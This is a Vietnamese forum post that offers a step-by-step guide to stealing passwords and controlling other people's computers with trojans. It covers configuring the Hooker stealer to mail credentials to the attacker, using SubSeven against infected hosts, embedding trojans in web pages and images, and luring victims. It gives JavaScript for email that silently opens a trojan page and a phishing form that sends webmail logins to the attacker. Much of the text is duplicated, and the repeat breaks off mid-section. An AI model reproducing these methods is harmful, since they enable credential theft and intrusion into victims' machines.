Trang Chính
Latest topics
» Hướng dẫn gắn Trojanby hqvuongbl2013 Mon 20 Jul - 17:44
» Căn bản về Trojan và cách lấy pass bằng Trojan
by Khang Joker Thu 16 Jul - 15:27
» Kĩ thuật gắn Trojan vào file html
by Khang Joker Thu 16 Jul - 15:25
» Viết Virus bằng pascal
by Khang Joker Thu 16 Jul - 15:18
» Tạo Virus đơn giản bằng notepad
by Khang Joker Thu 16 Jul - 15:08
» Hướng dẫn ae cách ngắt mạng quán net.troll max net :3
by thanhun7887 Thu 16 Jul - 15:07
Căn bản về Trojan và cách lấy pass bằng Trojan
Trang 1 trong tổng số 1 trang
Căn bản về Trojan và cách lấy pass bằng Trojan
Khang Joker Thu 16 Jul - 15:27
Các bạn thân mến tuy cung chỉ là 1 Lamer. Những kiếm thức mà tôi thu thập được cũng chỉ đủ để hack đựơc vào cái mail,tìm được một vài cái host có lỗi và thu thập được 1 số pass...Tất cả những điều đó quả thật nhỏ bé so với những gì mà các hacker trên thế giới đang làm .Nhưng hôm nay tôi cung xin mạo muội tổng kết và viết lại các kiến thức cơ bản về một thứ mà ai cung biết: TROJAN. Bài naỳ được viết với mục đích hướng dẫn thật tỉ mỉ và chi tiết để những ai chưa bao giờ nghiên cứu hack cũng có thể hiểu và thực hành đươc.Tuy rằng bài viết này chưa thể giúp các bạn xâm nhập vào các hệ thống lớn như webserver ,hostcontrol..nhưng trong 1 phạm vi nào đó các bạn cung thừa khả năng để đánh cắp pass email ,account hay xâm nhập vào máy nạn nhân và điều khiển.Ngoài ra để lấy được pass hiện nay còn có dùng spoofing.Bằng cách này bạn có thể được mật mã cũngnhư thẻ tín dụng mà không cần dùng đến trojan và đặc biệt là không e ngại tường lửa cũng như các hệ thống diệt virus khác.Nhưng trong phạm vi bài viết này tôi chỉ xin giới thiệu về trojan.
Nào chúng ta bắt đầu:
I/. Trojan là gì và hoạt động nhu thế nào và làm thế nào để sủ dụng nó :
Trojan có nhiều loại nhưng vẫn chủ yếu là 2 loại chính :
1.Trojan lấy pass rồi gửi cho ta pass đã lấy được qua email chẳng hạn nhu hooker, barok ...
2.Trojan dùng để điều khiển nhu SUB7, DUA TI CHOI...
Loại thứ 1: Trojan lấy pass rồi gửi cho ta pass đã lấy đuộc qua email .
*** Có nghĩa là sao??: Khi bạn gởi con trojan này cho nạn nhân (bạn bè ,kẻ thù ,người lạ..).và nếu như người đó kích hoạt trojan (có nghia là chạy nó) thì trojan sẽ bắt đầu hoạt động.
*** Nó hoạt động như thế nào:
A.Trước tiên nó sẽ bắt đầu tự động sao chép nó vào 1 nơi nào đó trên ổ cứng (thông thường là thư mục C:\Windows hoặc C:\Windows \System) tại vì những nơi đó thường chứa rất nhiều file l? và có lẽ bạn chưa bao giờ biết đến nhưng lai không bao giờ động đến nó như delete(xoá) hoăc rename(đổi tên)bởi vì bạn luôn cho rằng nó chính là file hệ thống và bạn chẳng bao giờ nhận biết đuợc nó có phải la file lạ hay không.
B.Sau khi tìm đuợc chỗ ẩn mình nó sẽ bắt đầu ghi vào registry của bạn các thông số để nó có thể tự động chạy mỗi lần khởi động máy và thông thường là nó vào khoá sau.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Muốn biết rõ hơn bạn làm như sau :
Chọn start _chọn run_Sau đó gõ vào ô vừa xuất hiện dòng chữ regedit nó sẽ mở ra 1 khung chương trình mới đó chính là cửa sổ registry.Bạn chọn HKEY_LOCAL_MACHINE sau đó chọn tiếp SOFTWARE
Rồi chọn tiếp Microsoft ,tiếp tục là chọn Windows ,chọn CurrentVersion,chọn Run
Okie.Tới đây ,bạn nhìn sang phía bên phải sẽ thấy 1 danh sách các chương tình đang được tự động chạy khi khởi động máy.
Nếu tinh ý bạn sẽ thấy 1 tên rất lạ mà bạn chưa bao giờ nhìn thấy trong các chương trình mình đã cài trên máy mình :chẳng hạn như sub7,hay ...twain...và bên cạnh nó là đường dãn đến file chương trình của nó .Xem hình minh hoạ :
Đây chính là nguồn gốc của vấn đề và nếu bạn xoá nó đi thì đuong nhiên ván đề sẽ được giải quyết.Bạn nhấp chuột phải vào cái tên lạ đấy rồi chọn delete.Okie.Trojan đã không thể tự động chạy mỗi khi khởi động máy nữa.Sau đó bạn khởi động máy lại và tìm đến đường dẫn của nó để xoá file exe của nó.Nên nhớ là phải khởi động lại máy ,bạn mới có thể xoá đựoc nó bởi vì nếu không ,nó sẽ không thể bị xoá vì nó vẫn đang ở cơ chế hoạt động.Xem hình minh hoạ
C.Vừa rồi chúng ta đã tìm hiểu nguyên nhân vì sao nó tự động chạy mỗi khi khởi động máy.bây giờ chúng ta sẽ nghiên cứu nó sẽ gửi thông tin trên máy và password đến chủ nhân của nó nhu thế nào .
Một số trojan nó sẽ lấy tất cả password cuả bạn lưu xuống máy như password khi connect ....Tất cả password khi bạn lưu này sẽ được ghi vào các tập tin *.pwl.Trojan giải mã nó rồi tự động gửi mail đến chủ nhân của nó với nội dung thu sẽ là user và password của bạn như vậy bạn đã bị lộ password.Một số khác còn có thể có thêm tính năng keylog ,tính năng này sẽ giúp nó ghi nhận đuợc tất cả những gì bạn gõ xuống máy và như thể không những lấy đuợc pass mà còn có thẻ lấy được số thẻ tín dụng và tất cả các thông tin vè bạn ...Tất cả các thông tin đó sẽ dược lưu vào tập tin nào đó trên máy.Sau đó nó sẽ gởi tất cả những thông tin này đến cho chủ nhân qua email khi bạn nối mạng
***Làm thế nào để sử dụng nó:
Nhu tôi đã nói từ đầu là trojan có rất nhiều loại .Trong phạm vi bài viết này tôi chỉ xin giới thiệu cách sử dụng 1 loại trojan đon giản và thông dụng là HOOKER
Bước 1 : bạn load con trojan Hooker về rồi giải nén ; Nó sẽ gồm các file sau :
Config.bat ;
history.txt ;
hkconf.exe ;
hooker.exe ;
Hkconf.ini ;
Buớc 2 : Bạn chạy file Hkconf.ini đây chính là file cần thiết để trojan có thể nhận biết được nó sẽ gửi email về địa chỉ nào thông qua host nào, bạn thay dổi các thông số của file này như sau :
host = hcm-mail-prepaid.vnn.vn(chú thích:Đây chính là địa chỉ SMTP ,thông qua host này ,trojan mới có thể gửi mail về cho bạn được ).Bạn có thể tìm các host này trên trang http://www.vnlogic.net/smtp.htm .Nhưng vấn đề là các host rất có thể lúc này sẽ hoạt động được nhưng 1 thời gian sau nó sẽ ngưng hoạt động hoặc hạn chế hoạt động vì thế anh em phải thương xuyên cập nhật và cũng đừng lấy làm lạ khi 1 ngày nào đó trojan khôgn thể gửi email về cho mình..Tôi thường dùng cái host này :hcm-mail-prepaid.vnn.vn vì nó nhanh và ổn định,đến nay thì nó vẫn hoạt động.
mailto=dịa chỉ email của bạn ( bạn điền vào đây địa chỉ email của bạn để trojan gửi email về cho bạn)
reg_desc = TaskMem
exename = MSCR56.exe
ở dòng cuối cùng của file này bạn thêm một dòng sau s13=logon
Buớc 3 : Sau khi thay dổi xong bạn save lại ! rồi chạy file Config.bat !!!
Buớc 4: Sau khi thực hiện xong 3 buớc trên bạn gửi file Hooker.exe cho victim !
Buớc 5 : Bạn chỉ việc ngồi chờ sao cho victim mở file của bạn gửi ! Thế là acc dã thuộc về bạn.
Còn để làm sao để dụ cho nạn nhân mở file hay buộc nạn nhân mở file thì xin các bạn hãy xem ở mục 2 :Làm thế nào để dụ nạn nhân mở file trojan hoặc trojan chạy trên máy họ trong khi họ không hay biết gì.
Đến đây các bạn đã hiểu được phần nào về trojan lấy pass,cách thức nó hoạt động và cách sử dụng nó ra sao.Còn nếu muốn tìm hiểu thêm thông tin về các loại trojan khác cung như cách dùng và địa chỉ để download các loại trojan đó thì các bạn có thể tham khảo thêm ở mục 3:Tài nguyên trojan trên mạng.Tiếp theo chúng ta sẽ nghiên cứu về loại trojan khác:Trojan dùng để điểu khiển
Loại thứ 2 : Trojan dùng để điều khiển
***Có nghia là sao??:Đặc điểm của loại trojan này là có thể cho phép chúng ta xâm nhập hoặc quậy phá trên máy nạn nhân bằng cách mở cổng trên máy nạn nhân.Nói 1 cách dễ hiểu cho các bạn là nhờ vào cái cổng này ,chúng ta sẽ biết đuợc số IP của nạn nhân bằng các công cụ scan cổng và có thể từ đó xâm nhập vào hay điều khiển máy của nạn nhân tuỳ theo các tính năng cửa trojan mà ngưòi lập trình ra nó đã lập trình ra.Mỗi trojan khác nhau loại này thường mở 1 cổng khác nhau còn gọi la backdoor.
***Nó hoạt động như thế nào:
A.Giống như loại 1
B.Giống như loại 1
C.Khác với trojan loại 1 đơn thuần chỉ là gởi mail về cho chủ nhân pass word của nạn nhân.Trojan loại 2 này có thể cho phép chủ nhân (người điều khiển) nắm quyèn điều khiển máy của nạn nhân tuỳ theo tính năng của trojan đó.
***Làm thế nào để sử dụng nó:
Trước tiên tôi xin nói khái quát về cách điều khiển nó.Và sau đó là đưa ra 1 ví dụ về cách điều khiển 1 con trojan nổi tiếng là SUB7.
A.Khái quát:
Thông thường trojan loại này thưòng có 2 file thậm chí 3 file trở lên:
Các file chủ yếu là:
.client.exe (đây là file mà ta phải giữ lại để điều khiển nạn nhân)
.Server.exe(đây là file mà ta phải gửi cho nạn nhân )
Sau khi gửi email cho nạn nhân con trojan (thông thường là file server.exe)hay bằng cách nào đó nạn nhân vô tình kích hoạt trojan ,Trojan sẽ bắt đầu cơ chế hoạt động của nó như đã nói ở phần Nó hoạt động như thế nào
Kế đến ,để điều khiển đuợc máy của nạn nhân đã bị nhiễm trojan chúng ta cần phải làm các bước sau:
Một số loại trojan mới đây cho phép bạn sau khi chạy chương trình điều khiển (file client.exe)chỉ cần nhấn nút connect là có thể biết đuợc số IP của nạn nhân đã bị nhiễm trojan thông qua việc nó tự động scan cổng măc định của trojan và từ các số Ip đó ,ta sẽ chọn máy của nạn nhân có số IP đó để kết nối vào và điều khiển (Nhắc lại về số IP:nó giống như 1 thẻ chứng minh nhân dân của bạn khi bạn lên mạng .Mỗi máy lên mạng đều có số IP riêng biệt khôgn ai giống ai.Khi bạn làm bất cứ 1 đièu gi đó phạm pháp chẳng hạn đột nhập vào hệ thống máy chủ ..nhưng lại không có kỹ năng xoá dấu chân ...thì người ta sẽ hoàn toàn có thể biết được để đề phòng hoặc thậm chí truy ra số IP của bạn và từ đó có thể biết được là vào thời điểm đó ,bạn tức là người sở hữu số Ip đó có số điện thoại là bao nhiêu đó đã làm việc phạm pháp.Đương nhiên có nhiều cách để che dấu số IP khi lên mạng bằng cách dùng proxy(đây chỉ là cách đơn giản và thô sơ ..Các bạn có thể tham khảo thêm ở http://www.vtv4online.net/ hoăc http://caodanghieu.dk3.com/) .Thế còn những loại trojan không thể cho ta tính năng scan cổng đó thì làm sao để ta biết đuợc IP của những nạn nhân bị nhiễm.Đuong nhiên chúng ta phải thực hiện thủ công.Trước tiên phải xác định số IP của những nạn nhân bị nhiễm chứ gì?.Bạn nên kiếm 1 công cụ scan cổng (scan port).các công cụ này các bạn có thể tìm thấy trên http://caodanghieu.dk3.com/.Chẳng hạn như trojan của bạn mở cổng 911 thì bạn có thể cho chương trình scan port scan từ 900 cho đến 920.Bạn điền vào khung start point(điểm khởi đầu):900 và stop point (điểm kết thúc):920.Thông thưòng thì chương trình scan cổng nào cung thiết kế khung chương trình như thế tức là bao gồm start point(điểm khởi đầu) và stop point (điểm kết thúc).Bạn cứ nhập vào và scan.Nói thế chắc các bạn đã hiểu.Ngay lập tức nếu đến cổng nào đó có số IP nào bị nhễm thì nó se ghi trong danh sách là : Tại cổng 911 (số cổng mà các trojan đã mở) ,có số IP này 203.162.23.23 bị nhiễm (đây là số Ip của nạn nhân bị nhiẽm).Chú ý là các con số911 hay 203.162.23.23 chỉ là các con số mà tôi đua ra để ví dụ .Các con số này tuỳ thuộc vào cổng mà trojan đã mở và số IP bi nhiễm.Sau khi đã có số IP rồi của nạn nhân bị nhiễm trojan mở cổng đó rồi ,bạn bắt đầu dùng con điều khiển(client.exe),bạn copy số IP đó vào ô nhập IP rồi nhấn connect.Sau khi connect xong là bạn có thể tha hồ điều khiển rồi đấy.Bạn có thể chọn các tính năng sẵn có trên chương trình điều khiển để quậy .
B.Ví dụ điều khiển nạn nhân bị nhiễm SUB7 mọt loại trojan điều khiển rất hay:
Bạn có thê down trojan này trên web http://caodanghieu.dk3.com/ trong phần hack .Sau khi gửi cho nạn nhân file server.exe.Bạn chạy chương trình điều khiển client.exe .Phiên bản SUb7 ,à tôi nói tới đây mở cổng là 1243 vì thế bạn nên scan trong phạm vi cổng này tìm và lấy số IP của nạn nhân bị nhiễm trojan mở cổng này.Bạn kiếm 1 chương trình scan cổng bất kỳ và scan cổng trong phạm vi là 1243 ,bạn sẽ tìm ra đuợc số IP bị nhiễm trojan mở cổng 1243.Có đuợc số IP rồi bạn copy nó vào ô nhập IP rồi nhấn nút connect.Sau khi connect xong ,bạn đã có thể bắt đầu điều khiển rồi đấy.Tôi chỉ bày tới đây.Bởi vì mọi việc bây giờ quá đơn giản ,nếu biết tiếng anh bạn sẽ biết các nút tính năng trên chương tình có thể cho ta điều khiển cái gì ,làm cái gì ....chẳng hạn như chat với nạn nhân,khoá bàn phím ,lấy thông tin từ keylog...Các bạn có thể xem hình minh hoạ để nắm rõ các bước cơ bản để connect và điều khiển.
Đến đây các bạn thấy sao,đã hiểu đuợc phần nào chưa.Tôi chắc qua cách trình bày quá dễ hiểu và mạch lạc như thế này các bạn cũng có thể tự tin mà thực hành được rồi đấy.
Sau đây sẽ là các thủ thuật để các bạn dụ nạn nhân mở file trojan hoặc cho trojan chạy trên máy nạn nhân trong khi nạn nhân không hề hay biết gì.
II/ .Các thủ thuật để các bạn dụ nạn nhân mở file trojan hoặc cho trojan chạy trên máy nạn nhân trong khi nạn nhân không hề hay biết gì ( thế mới ác chứ)
Điều cần nhất trong quá trình này là bạn phải có 1 trang web để upload trang web có đính kèm trojan lên đó .Sau đó sẽ gửi mail cho nạn nhân ,trong email sẽ có 1 đoạn mã để mở trang web có đính kèm trojan đó.Trang web sẽ đuợc mở âm thầm mà nạn nhân không hề hay biết trừ khi nạn nhân cài norton antivirus 2002 ,tường lửa..hoặc disable tính năng activex trong internet option.
Còn nếu không thì chỉ còn cách gởi trojan cho nạn nhân và chờ nạn nhân kích hoạt nó.Nhưng cũng đừng bi quan ,chúng ta cung vẫn có thể đính kèm trojan vào 1 file ảnh và khi nạn nhân xem ảnh thì trojan sẽ chạy thôi.Lo gì.
****************************************************************************************************
**************************
Trường hợp thứ nhất : Nếu bạn có thể upload 1 trang web lên đâu đó.
Bạn có thể tham khảo các bài vè tạo 1 trang web trên mạng trên http://www.viet-online.net/.Sau đó đính kèm trojan vào web rồi gửi mail đến cho nạn nhân .
Để đính kèm trojan vào web ,trước tiên bạn cần tạo 1 trang web,nếu bạn là người chưa biết gì về web thì có 2 cách đon giản để bạn tạo trang web là như sau.Thứ nhất,bạn save 1 trang web nào đó trên m?ng .Thứ 2 ,bạn dùng world97 tạo 1 văn bản mới ,bạn tha hồ vẽ vời vào trong đó(đừng nói là bạn không biết dùng world đó nha),xong ,bạn lưu lại dưới dạng html(hoặc htm).Như vậy là bạn đã có 1 trang web.
Sau đó bạn cần 1 công cụ godwill đề đính kèm trojan vào trang web vừa tạo (bạn có thể down ở http://caodanghieu.dk3.com/ trong phần công cụ).
Cách sử dụng godwill như sau
Chạy chương trình --> chọn Enter --> chọn nút "html" trong các nút ở cuối cửa sổ Godwill --> chọn "general options" (hình 1).
+enter .exe file: path tới file trojan (k2ps.exe).
+enter .html file: trang web mà mình đã thiết kế.
+enter output: ten trang web có đính mã Godmessage (VD để là xxx.html, sau khi hoàn tất các công đoạn sẽ xuất hiện file xxx.html trong thư mục Godwill, trang web này đã đựơc gán trojan, không được mở).
+các tùy chọn khác là để thông báo bằng đường ICQ... nếu là newbie thì khỏi cần để ý.
+browser redirection: sau khi đọc trang web victim sẽ được chuyển về là http://www.yahoo.com/ (tùy bạn).
+HTA filename: sau khi xem web, trong start-up của victim sẽ xuất hiện 1 file .HTA ,đặt tên file đó nghe sao cho "microsoft" một chút để khỏi bị nghi ngờ (VD: msreg)
+sau đó chọn done.
+phần "advanced option" không cần để ý cũng được.
+muốn save config hay không là tùy ý, nhấn nút có chữ "GEN", trang web có gán trojan sẽ được tạo ra.
Bạn lưu trang web này lại và upload lên đâu đó trên các host .Xin lõi vì tôi không thể bày các bạn cụ thể về vấn đề này trong phạm vi bài viêt này.Nếu bạn muốn biêt thêm chi tiết về cách làm web và upload web xin hãy lên: http://www.viet-online.net/
Nếu như con trojan của bạn lớn hơn 34kb thì lúc dó bạn không thể đính kèm nó vào web được.Cách đơn giản để giải quyết vấn đề này là bạn up con trojan có kích thuớc lên dâu dó trên web hay ở đâu cũng dược miễn là bạn như dịa chỉ của file trojan dó(duong nhiên la file exe).Sau dó bạn dùng con chuong trình này để có thể tạo ra con trojan có kích thuớc 5kb có khả năng download file trojan lớn ở trên web về máy nạn nhân và chạy nó.Sau đó đính kèm con trojan có kích thước nhỏ này vào web như đã bày ở trên.Okie.một việc thật là đơn giản.Cách sử dụng nó có lẽ các bạn nên tự tìm hiểu lấy vì trong phạm vi bài viết về trojan này tôi không thể bày cặn kẽ về mọi vấn đề đuợc.
Okie.Sau khi đã có dược 1 trang web trên mạng .Bạn nên ghi nhớ địa chỉ của trang web có dính kèm trojan đó.
A.Neu nhu Victim dung OUTLOOK EXPRESS de nhan thu :
Bây giờ là cách chèn đoạn mã script vào source của mail để khi nạn nhân mở mail ,trang web có đính kèm trojan của ta sẽ âm thầm mở.
Nếu bạn gởi mail bằng OUTLOOK EXPRESS thì bạn bắt đầu chọn file kế đến chọn new kế đến chọn mailmessage
sau khi hiện ra khung gửi thu bạn chọn nút view_source edit.Tab Source dã hiện ra rồi ! Click ...
Nhìn qua , ta thấy dó là source của thu ( thường bằng HTML )
Tìm thẻ Body , sữa nó thành như dòng
<body onLoad="autoweb()">
Sau đó chèn đoạn mã sau vào
kế tiếp
<script LANGUAGE="JavaScript">
function autoweb()
{{window.open("http://www.yourweb.com","","width=1,height=1,resizable=yes,top=10000,bottom=10000")}}
</SCRIPT>
Như vậy chỉ cần victim xem mail của bạn bằng OUTLOOK EXPRESS thì trang web có gán trojan (ở đây là <http://www.yourweb.com)/> sẽ âm thầm được mở (nếu không chú ý thì victim sẽ không phát hiện vì trang web được mở rất kín).
http://www.yourweb.com chính là địa chỉ của trang web bị nhiễm trojan mà bạn đã tạo ra lúc đầu đấy.
B.Nếu nạn nhân dùng Webmail để nhận thư:
1.Đầu tiên bạn đăng ký 1 địa chỉ email ở hotmail hay bất cứ webmail nào khác.Sau đó dùng địa chỉ email này để đăng ký 1 host (xem thêm về cách đăng ký host) ở www.trypod.com hay bất cứ host nào khác hỗ trợ CGI.
2.Việc cần làm tiếp theo là bạn phải làm 1 trang web giả mạo trang webmail của nạn nhân.Tốt nhất là phải ;àm 1 trang báo lỗi giả mạo để nạn nhân khỏi nghi ngờ.Có 2 cách để có được 2 loại trang báo lỗi
Cách1:Bạn login vào dưới 1 cái tên nào đó bạn bịa ra và password cũng do bạn bịa.Nó sẽ hiện ra trang báo lỗi rằng bạn đã nhập sai pass..Bạn lưu trang lỗi này lại cùng với tất cả các hình ảnh.
Cách2:Bạn tạo 1 địa chỉ email trên webmail mà nạn nhân đang sử dụng(yahoo,hotmail...)Sau đó bạn login vào và đợi khoảng hơn 1 tiếng đồng hồ và nhấn vào nút SOẠN THƯ(compose,write mesage)
bạn sẽ nhận được trang báo lỗi với các lỗi như:Time out..Bạn cũng lưư trang lỗi này lại với tất cả hình ảnh của nó.
3.Bạn dùng NOTEPAD hay bất cứ chương trình soạn thảo văn bản nào để biên tập lại file web lỗi mà bạn đã lưu về
Bước 1.Tìm đến dòng có thẻ: <head>...</head> và thay nó bằng <noscript><head></head></noscript> để ngăn cái popup quảng cáo của TRYPOD mục đích là để làm cho nạn nhân khỏi nghi ngờ.
Bước 2.Tìm đến dòng: <form method=post action="xxxxxxxxxxx"> và thay nó thành <form action="http://www.free-cgi.ch/cgi-bin/formmail-a.cgi" method="get"> <input type="hidden" name="redirect" value="http://xxx.xx"><input type="hidden" name="recipient" value= "your@email">
your@email chính là địa chỉ emaill mà bạn đã đăng ký lúc đầu và đã dùng nó để
đăng ký host .
Bước 3:Upload file html đó lên host Trypod
Bước 4:Gửi cho nạn nhân một fake email định dạng html .Trong đó bạn điền đoạn code này:<meta http-equiv="refresh" content="1;url=Địa chỉ trang web lỗi của bạn"> vào trong thẻ <head></head>
Bây giờ bạn chỉ can ngồi chờ nạn nhân mở mail và khi nạn nhân mở mail trang webmail sẽ refresh thành trang lỗi của bạn.Khi đó nếu nạn nhân login lại thì đòng nghĩa với việc 1 email chứa thông tin của nạn nhân(user và pass) sẽ được gửi đến email của bạn(email lúc đầu mà bạn đã đăng ký).
Trường hợp thứ hai:Nếu bạn không thể upload 1 trang web lên âu đó và thậm chí cũng không có khả năng tạo 1 trang web thì có lẽ chỉ còn 2 cách sau
.Gửi file trojan trực tiếp cho nạn nhân và hy vọng nạn nhân sẽ ngu ngốc đến nỗi sẽ kích hoạt nó.
.Cách thứ 2 là đính kèm trojan vào 1 file ảnh.Chương trình này hiện có trên http://caodanghieu.dk3.com trong phần công cu.Sau đó gửi file ảnh đã dính kèm trojan này cho nạn nhân .Nếu là file ảnh thì có lẽ nạn nhân sẽ mở mà không ngần ngại đâu.
III/. Tài nguyên trên mạng về trojan
Hiện có rất nhiều địa chỉ cung cấp cho các bạn trojan cũng như các thông tin về nó.
.Những chương trình mà tôi nói tới trong bài này hiện đều có trên http://caodanghieu.dk3.com/.
.Ngoài ra các bạn có thể tìm thêm các trojan khác ở các trang web nổi tiếng sau:
http://megasecurity.org/,http://www.tlsecu....blackcode.com/.
.Nếu bạn muốn tìm 1 con trojan nào hay công cụ nào ,bạn cung có thẻ tìm nó trên http://www.google.com/ bằng cách gõ tên chương trình ,trojan vào khung tìm kiếm rồi nhấn Enter.
Nào chúng ta bắt đầu:
I/. Trojan là gì và hoạt động nhu thế nào và làm thế nào để sủ dụng nó :
Trojan có nhiều loại nhưng vẫn chủ yếu là 2 loại chính :
1.Trojan lấy pass rồi gửi cho ta pass đã lấy được qua email chẳng hạn nhu hooker, barok ...
2.Trojan dùng để điều khiển nhu SUB7, DUA TI CHOI...
Loại thứ 1: Trojan lấy pass rồi gửi cho ta pass đã lấy đuộc qua email .
*** Có nghĩa là sao??: Khi bạn gởi con trojan này cho nạn nhân (bạn bè ,kẻ thù ,người lạ..).và nếu như người đó kích hoạt trojan (có nghia là chạy nó) thì trojan sẽ bắt đầu hoạt động.
*** Nó hoạt động như thế nào:
A.Trước tiên nó sẽ bắt đầu tự động sao chép nó vào 1 nơi nào đó trên ổ cứng (thông thường là thư mục C:\Windows hoặc C:\Windows \System) tại vì những nơi đó thường chứa rất nhiều file l? và có lẽ bạn chưa bao giờ biết đến nhưng lai không bao giờ động đến nó như delete(xoá) hoăc rename(đổi tên)bởi vì bạn luôn cho rằng nó chính là file hệ thống và bạn chẳng bao giờ nhận biết đuợc nó có phải la file lạ hay không.
B.Sau khi tìm đuợc chỗ ẩn mình nó sẽ bắt đầu ghi vào registry của bạn các thông số để nó có thể tự động chạy mỗi lần khởi động máy và thông thường là nó vào khoá sau.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Muốn biết rõ hơn bạn làm như sau :
Chọn start _chọn run_Sau đó gõ vào ô vừa xuất hiện dòng chữ regedit nó sẽ mở ra 1 khung chương trình mới đó chính là cửa sổ registry.Bạn chọn HKEY_LOCAL_MACHINE sau đó chọn tiếp SOFTWARE
Rồi chọn tiếp Microsoft ,tiếp tục là chọn Windows ,chọn CurrentVersion,chọn Run
Okie.Tới đây ,bạn nhìn sang phía bên phải sẽ thấy 1 danh sách các chương tình đang được tự động chạy khi khởi động máy.
Nếu tinh ý bạn sẽ thấy 1 tên rất lạ mà bạn chưa bao giờ nhìn thấy trong các chương trình mình đã cài trên máy mình :chẳng hạn như sub7,hay ...twain...và bên cạnh nó là đường dãn đến file chương trình của nó .Xem hình minh hoạ :
Đây chính là nguồn gốc của vấn đề và nếu bạn xoá nó đi thì đuong nhiên ván đề sẽ được giải quyết.Bạn nhấp chuột phải vào cái tên lạ đấy rồi chọn delete.Okie.Trojan đã không thể tự động chạy mỗi khi khởi động máy nữa.Sau đó bạn khởi động máy lại và tìm đến đường dẫn của nó để xoá file exe của nó.Nên nhớ là phải khởi động lại máy ,bạn mới có thể xoá đựoc nó bởi vì nếu không ,nó sẽ không thể bị xoá vì nó vẫn đang ở cơ chế hoạt động.Xem hình minh hoạ
C.Vừa rồi chúng ta đã tìm hiểu nguyên nhân vì sao nó tự động chạy mỗi khi khởi động máy.bây giờ chúng ta sẽ nghiên cứu nó sẽ gửi thông tin trên máy và password đến chủ nhân của nó nhu thế nào .
Một số trojan nó sẽ lấy tất cả password cuả bạn lưu xuống máy như password khi connect ....Tất cả password khi bạn lưu này sẽ được ghi vào các tập tin *.pwl.Trojan giải mã nó rồi tự động gửi mail đến chủ nhân của nó với nội dung thu sẽ là user và password của bạn như vậy bạn đã bị lộ password.Một số khác còn có thể có thêm tính năng keylog ,tính năng này sẽ giúp nó ghi nhận đuợc tất cả những gì bạn gõ xuống máy và như thể không những lấy đuợc pass mà còn có thẻ lấy được số thẻ tín dụng và tất cả các thông tin vè bạn ...Tất cả các thông tin đó sẽ dược lưu vào tập tin nào đó trên máy.Sau đó nó sẽ gởi tất cả những thông tin này đến cho chủ nhân qua email khi bạn nối mạng
***Làm thế nào để sử dụng nó:
Nhu tôi đã nói từ đầu là trojan có rất nhiều loại .Trong phạm vi bài viết này tôi chỉ xin giới thiệu cách sử dụng 1 loại trojan đon giản và thông dụng là HOOKER
Bước 1 : bạn load con trojan Hooker về rồi giải nén ; Nó sẽ gồm các file sau :
Config.bat ;
history.txt ;
hkconf.exe ;
hooker.exe ;
Hkconf.ini ;
Buớc 2 : Bạn chạy file Hkconf.ini đây chính là file cần thiết để trojan có thể nhận biết được nó sẽ gửi email về địa chỉ nào thông qua host nào, bạn thay dổi các thông số của file này như sau :
host = hcm-mail-prepaid.vnn.vn(chú thích:Đây chính là địa chỉ SMTP ,thông qua host này ,trojan mới có thể gửi mail về cho bạn được ).Bạn có thể tìm các host này trên trang http://www.vnlogic.net/smtp.htm .Nhưng vấn đề là các host rất có thể lúc này sẽ hoạt động được nhưng 1 thời gian sau nó sẽ ngưng hoạt động hoặc hạn chế hoạt động vì thế anh em phải thương xuyên cập nhật và cũng đừng lấy làm lạ khi 1 ngày nào đó trojan khôgn thể gửi email về cho mình..Tôi thường dùng cái host này :hcm-mail-prepaid.vnn.vn vì nó nhanh và ổn định,đến nay thì nó vẫn hoạt động.
mailto=dịa chỉ email của bạn ( bạn điền vào đây địa chỉ email của bạn để trojan gửi email về cho bạn)
reg_desc = TaskMem
exename = MSCR56.exe
ở dòng cuối cùng của file này bạn thêm một dòng sau s13=logon
Buớc 3 : Sau khi thay dổi xong bạn save lại ! rồi chạy file Config.bat !!!
Buớc 4: Sau khi thực hiện xong 3 buớc trên bạn gửi file Hooker.exe cho victim !
Buớc 5 : Bạn chỉ việc ngồi chờ sao cho victim mở file của bạn gửi ! Thế là acc dã thuộc về bạn.
Còn để làm sao để dụ cho nạn nhân mở file hay buộc nạn nhân mở file thì xin các bạn hãy xem ở mục 2 :Làm thế nào để dụ nạn nhân mở file trojan hoặc trojan chạy trên máy họ trong khi họ không hay biết gì.
Đến đây các bạn đã hiểu được phần nào về trojan lấy pass,cách thức nó hoạt động và cách sử dụng nó ra sao.Còn nếu muốn tìm hiểu thêm thông tin về các loại trojan khác cung như cách dùng và địa chỉ để download các loại trojan đó thì các bạn có thể tham khảo thêm ở mục 3:Tài nguyên trojan trên mạng.Tiếp theo chúng ta sẽ nghiên cứu về loại trojan khác:Trojan dùng để điểu khiển
Loại thứ 2 : Trojan dùng để điều khiển
***Có nghia là sao??:Đặc điểm của loại trojan này là có thể cho phép chúng ta xâm nhập hoặc quậy phá trên máy nạn nhân bằng cách mở cổng trên máy nạn nhân.Nói 1 cách dễ hiểu cho các bạn là nhờ vào cái cổng này ,chúng ta sẽ biết đuợc số IP của nạn nhân bằng các công cụ scan cổng và có thể từ đó xâm nhập vào hay điều khiển máy của nạn nhân tuỳ theo các tính năng cửa trojan mà ngưòi lập trình ra nó đã lập trình ra.Mỗi trojan khác nhau loại này thường mở 1 cổng khác nhau còn gọi la backdoor.
***Nó hoạt động như thế nào:
A.Giống như loại 1
B.Giống như loại 1
C.Khác với trojan loại 1 đơn thuần chỉ là gởi mail về cho chủ nhân pass word của nạn nhân.Trojan loại 2 này có thể cho phép chủ nhân (người điều khiển) nắm quyèn điều khiển máy của nạn nhân tuỳ theo tính năng của trojan đó.
***Làm thế nào để sử dụng nó:
Trước tiên tôi xin nói khái quát về cách điều khiển nó.Và sau đó là đưa ra 1 ví dụ về cách điều khiển 1 con trojan nổi tiếng là SUB7.
A.Khái quát:
Thông thường trojan loại này thưòng có 2 file thậm chí 3 file trở lên:
Các file chủ yếu là:
.client.exe (đây là file mà ta phải giữ lại để điều khiển nạn nhân)
.Server.exe(đây là file mà ta phải gửi cho nạn nhân )
Sau khi gửi email cho nạn nhân con trojan (thông thường là file server.exe)hay bằng cách nào đó nạn nhân vô tình kích hoạt trojan ,Trojan sẽ bắt đầu cơ chế hoạt động của nó như đã nói ở phần Nó hoạt động như thế nào
Kế đến ,để điều khiển đuợc máy của nạn nhân đã bị nhiễm trojan chúng ta cần phải làm các bước sau:
